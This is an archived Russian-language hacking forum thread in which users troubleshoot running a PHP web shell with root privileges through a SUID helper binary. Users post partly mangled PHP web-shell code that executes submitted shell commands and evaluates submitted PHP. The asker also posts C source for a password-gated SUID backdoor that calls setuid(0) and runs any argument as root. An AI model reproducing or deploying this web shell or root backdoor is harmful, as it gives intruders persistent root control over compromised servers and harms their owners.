Просмотр полной версии : suid шелл. посоветуйте.
нужен шелл что бы указать суид и быть под рутом.
попробовал wso который в этой ветке.
но при активации суида почему то выбросило в форму пароля и при вводе пароля появляется лишь надпись сверху X-Powered-By: PHP/5.2.9 Content-type: text/html; charset=utf-8
и строка ввода пароля.
кто знает как исправить или посоветуйте похожий скрипт.
скажите как правильно в wso suid указывать? у меня он лежит в папке с шеллом я указываю ./suid при нажатии он выдает что все root но потом когда нажимаешь по ссылкам шелла н выкидывает на страницу пароля и все. может я не правильно что делаю. помогите плиз мне срочно.
shell_c0de
24.09.2011, 16:28
/showthread.php?t=287507
shell_c0de said:
/showthread.php?t=287507
да я про этот и пишу. еще скачал wso там где два файла wso и wrapper.php указал путь к суиднику на шелл можно зайти вверху в шеле показано что я root но нельзя ходить по папкам и выполнять команды. только страница шелла и все. в чем же проблема?
<Cyber-punk>
24.09.2011, 18:36
Code:
'.
''.
'r00t web-shell'.
''.
'';
/*********** MAIN CODE ***************/
/*
Выводим форму для выполнения команд
*/
if(!isset($_POST['cmd']))
{
print ''.
''.
''.
'
';
}
else
{
hack_system($_POST['cmd'],$pass_suid);
}
/*
Выводим заветную кнопочку для получения
рута
*/
if(!isset($_POST['give_me_root']))
{
print '
';
}
else
{
give_me_root();
}
/********** END CODE *************/
print
''.
'';
?>
Мини-шелл + исполнение эксплойта
тут еще проблемка. при исполнении этих скриптов первого и второго в error_log'е вот такая вот ошибка: PHP Warning: Module 'mbstring' already loaded in Unknown on line 0
said:
Code:
'.
''.
'r00t web-shell'.
''.
'';
/*********** MAIN CODE ***************/
/*
Выводим форму для выполнения команд
*/
if(!isset($_POST['cmd']))
{
print ''.
''.
''.
'
';
}
else
{
hack_system($_POST['cmd'],$pass_suid);
}
/*
Выводим заветную кнопочку для получения
рута
*/
if(!isset($_POST['give_me_root']))
{
print '
';
}
else
{
give_me_root();
}
/********** END CODE *************/
print
''.
'';
?>
Мини-шелл + исполнение эксплойта
плин. ничего не понимаю. и в этом команды не выполняются. хотя когда нажимаешь give me root пишет ок. а команды не отоброжаются. в чем же тут проблема?
я вот такой суидник юзаю. может с ним что не так:
#include
#include
main(int argc, char *argv[])
{
if(argc == 3){
if(strcmp(argv[1],"cool_hack") == 0){
setgid(0);
setuid(0);
system(argv[2]);
}
}
return 0;
}
<Cyber-punk>
24.09.2011, 19:52
Code:
$v){$_POST[$k] = stripslashes($v);}}
@ini_set('max_execution_time',0);
(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF");
(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
$action=$_POST['action'];
$content='';
$stdata='';
$style='BODY{background-color: #2b2f34;color: #9acd32;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #31333b;scrollbar-shadow-color: #363940;scrollbar-highlight-color: #363940;scrollbar-3dlight-color: #363940;scrollbar-darkshadow-color: #363940;scrollbar-track-color: #363940;scrollbar-arrow-color: #363940;}input{background-color: #31333b;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #31333b;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #363940;font-size: 11pt;color: #FFFAFA;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #91cd32;text-decoration: none;font-size: 8pt;}a:visited{color: #91cd32;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}';
$header=''.getenv("HTTP_HOST").' - R00t Web-Shell'.$style.'';
$footer='';
$lang=array('allfuncsh'=>'All function for work shell was disabled.');
$act=array('shell','phpeval');//here added new actions
if(isset($action)){if(!in_array($action,$act))$act ion="shell";else $action=$action;}else $action="shell";
function shell($cmd,$suid_pass,$suid)
{
global $lang;
$code = $suid.' '.$suid_pass.' "'.$cmd.'"';
$ret = '';
if(!empty($code)) {
if(function_exists('exec')){
@exec($code,$ret);$ret = join("\n",$ret);
} elseif(function_exists('shell_exec')) {
$ret = @shell_exec($code);
} elseif(function_exists('system')) {
@ob_start()
;@system($code);
$ret = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($code);
$ret = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($code,"r"))) {
$ret = "";
while(!@feof($f)) {
$ret .= @fread($f,1024);
}
@pclose($f);
} else {
$ret=$lang['allfuncsh'];
}
}
return $ret;
}
//shell
if($action=="shell"){
$content.="
".@$_POST['command']."
".convert_cyr_string(htmlspecialchars(shell($_POST['command'],$suid_pass,$suid)),"d","w")."
";}
//phpeval
if($action=="phpeval"){
$content.="
<?php
".@$_POST['phpev']."
?>
";
if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
?>'; document.reqs.submit();">.| Shell |. '; document.reqs.submit();">.| Php Eval |..| .| forward->|.
Safe mode:
Disable functions:
OS:
Server:
Id:
| COPYRIGHT BY ANTICHAT.RU | Made by Grinay | Modified by daniel_1024 |
Скажи спасибо daniel_1024!
вообщем вроде разобрался. daniel_1024!, спасибо.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot